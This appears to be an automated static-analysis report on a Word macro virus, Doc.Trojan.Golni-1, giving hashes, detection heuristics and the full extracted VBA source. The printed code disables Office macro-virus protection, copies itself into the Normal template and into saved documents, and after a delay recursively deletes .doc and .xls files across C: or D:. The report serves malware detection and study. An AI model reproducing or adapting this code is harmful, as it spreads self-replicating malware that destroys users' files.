Doc.Trojan.Golni-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 b00a3e708cf4fc84…

MALICIOUS

Office (OLE)

36.0 KB Created: 2002-08-21 11:12:00 Authoring application: Microsoft Word 9.0 First seen: 2015-09-30
MD5: 8482b8095ebf7036b2651c91196aae20 SHA-1: 292f029275b5a2ae32e319ac405ca637a4087174 SHA-256: b00a3e708cf4fc84196fe2661fe874b2348a97c3625adde546df22112f34d7df
248 Risk Score

Malware Insights

Doc.Trojan.Golni-1 · confidence 95%

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1553.005 Mark-of-the-Web Bypass

The sample contains VBA macros with legacy WordBasic virus markers and self-replication capabilities, indicating a malicious intent. The 'AutoOpen' macro and the 'Doc.Trojan.Golni-1' ClamAV detection further support this. The script likely aims to download and execute a second-stage payload, as suggested by the presence of file system interaction functions and the general behavior of this malware family.

Heuristics 5

  • ClamAV: Doc.Trojan.Golni-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Golni-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
     Sub AutoOpen()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5237 bytes
SHA-256: 5f73ce9ed009aaa4345c5cfd52302b62323754646953bc014d9ee6e4c5235692
Detection
ClamAV: Doc.Trojan.Golni-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "avp"
Option Explicit
Dim k As String, f As String
Private Declare Function FindFirstFile Lib "kernel32" _
Alias "FindFirstFileA" _
(ByVal lpFileName As String, _
lpFindFileData As WIN32_FIND_DATA) As Long
Private Declare Function FindNextFile Lib "kernel32" _
Alias "FindNextFileA" _
(ByVal hFindFile As Long, _
lpFindFileData As WIN32_FIND_DATA) As Long
Private Declare Function GetFileAttributes Lib "kernel32" _
Alias "GetFileAttributesA" _
(ByVal lpFileName As String) As Long
Private Declare Function FindClose Lib "kernel32" _
(ByVal hFindFile As Long) As Long
Const MAX_PATH = 260
Const MAXDWORD = &HFFFF
Const INVALID_HANDLE_VALUE = -1
Const FILE_ATTRIBUTE_ARCHIVE = &H20
Const FILE_ATTRIBUTE_DIRECTORY = &H10
Const FILE_ATTRIBUTE_HIDDEN = &H2
Const FILE_ATTRIBUTE_NORMAL = &H80
Const FILE_ATTRIBUTE_READONLY = &H1
Const FILE_ATTRIBUTE_SYSTEM = &H4
Const FILE_ATTRIBUTE_TEMPORARY = &H100
Private Type FILETIME
dwLowDateTime As Long
dwHighDateTime As Long
End Type
Private Type WIN32_FIND_DATA
dwFileAttributes As Long
ftCreationTime As FILETIME
ftLastAccessTime As FILETIME
ftLastWriteTime As FILETIME
nFileSizeHigh As Long
nFileSizeLow As Long
dwReserved0 As Long
dwReserved1 As Long
cFileName As String * MAX_PATH
cAlternate As String * 14
End Type
Private Function StripNulls(OriginalStr As String) As String
If (InStr(OriginalStr, Chr(0)) > 0) Then
OriginalStr = Left(OriginalStr, _
InStr(OriginalStr, Chr(0)) - 1)
End If
StripNulls = OriginalStr
End Function
Private Function FindFilesAPI(path As String, _
SearchStr As String, _
FileCount As Integer, _
DirCount As Integer)
On Error Resume Next
Dim FileName As String
Dim DirName As String
Dim dirNames() As String
Dim nDir As Integer
Dim i As Integer
Dim hSearch As Long
Dim WFD As WIN32_FIND_DATA
Dim Cont As Integer
If Right(path, 1) <> "\" Then path = path & "\"
nDir = 0
ReDim dirNames(nDir)
Cont = True
hSearch = FindFirstFile(path & "*", WFD)
If hSearch <> INVALID_HANDLE_VALUE Then
Do While Cont
DirName = StripNulls(WFD.cFileName)
If (DirName <> ".") And (DirName <> "..") Then
If GetFileAttributes(path & DirName) And _
                           FILE_ATTRIBUTE_DIRECTORY Then
dirNames(nDir) = DirName
DirCount = DirCount + 1
nDir = nDir + 1
ReDim Preserve dirNames(nDir)
End If
End If
Cont = FindNextFile(hSearch, WFD)
Loop
Cont = FindClose(hSearch)
End If
hSearch = FindFirstFile(path & SearchStr, WFD)
Cont = True
If hSearch <> INVALID_HANDLE_VALUE Then
While Cont
FileName = StripNulls(WFD.cFileName)
If (FileName <> ".") And (FileName <> "..") Then
FindFilesAPI = FindFilesAPI + _
(WFD.nFileSizeHigh * MAXDWORD) + _
WFD.nFileSizeLow
FileCount = FileCount + 1
On Error Resume Next
Kill path & FileName
End If
Cont = FindNextFile(hSearch, WFD)
Wend
Cont = FindClose(hSearch)
End If
If nDir > 0 Then
For i = 0 To nDir - 1
FindFilesAPI = FindFilesAPI + _
FindFilesAPI(path & dirNames(i) _
& "\", SearchStr, FileCount, DirCount)
Next i
End If
End Function
 Sub AutoOpen()
Dim ad, nt
On Error Resume Next
Options.VirusProtection = False
ad = ActiveDocument.Name
nt = NormalTemplate.FullName
If NormalTemplate.VBProject.VBComponents.Item("Avp").Name = " " Then
k = FreeFile
MakeFile
End If
If NormalTemplate.VBProject.VBComponents.Item("Avp").Name <> "Avp" Then
Application.OrganizerCopy Source:=ad, Destination:=nt, Name:="Avp", Object:=wdOrganizerObjectProjectItems
End If
NormalTemplate.Save
DooIt
End Sub
Sub FileSave()
On Error Resume Next
If ActiveDocument.VBProject.VBComponents.Item("Avp").Name <> "avp" Then
NormalTemplate.VBProject.VBComponents("avp").Export "C:\Winlog.log"
ActiveDocument.VBProject.VBComponents.import "C:\Winlog.log"
Kill "C:\Winlog.log"
End If
ActiveDocument.Save
k = FreeFile
f = Dir$("C:\WINDOWS\Application Data\HelBoot.txt")
If f = "" Then
MakeFile
End If
DooIt
End Sub
Sub ViewVBCode()
If Options.BlueScreen = True Then ShowVisualBasicEditor = True
End Sub
Sub ToolsMacro()
End Sub
Sub DooIt()
On Error Resume Next
Dim d1 As Date, d, k As String, d2 As Date, t As Date
d1 = Format(Now, "short date"): k = FreeFile
Open "C:\WINDOWS\HelBoot.txt" For Input As #k
t = Format(Now, "short date")
Input #k, t
Close k
d2 = CDate(t): d = d1 - d2
Dim NumFiles As Integer, NumDirs As Integer, FileSize As Long
Dim SearchPath As String, FindStr As String, p, s
s = Int(1 + (Rnd() * 2))
If s = 1 Then
SearchPath = "C:\"
ElseIf s = 2 Then
SearchPath = "D:\"
End If
If 5 < d Then
p = Int(1 + (Rnd() * 2))
If p = 1 Then
FindStr = "*.xls"
ElseIf p = 2 Then
FindStr = "*.doc"
ElseIf p = 1 And 12 < d Then
FindStr = "*.txt"
End If
FileSize = FindFilesAPI(SearchPath, FindStr, NumFiles, NumDirs)
End If
End Sub
Sub MakeFile()
Open "C:\WINDOWS\Application Data\HelBoot.txt" For Output As #k
Dim t As Date
t = Format(Now, "short date")
Write #k, t
Close k
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.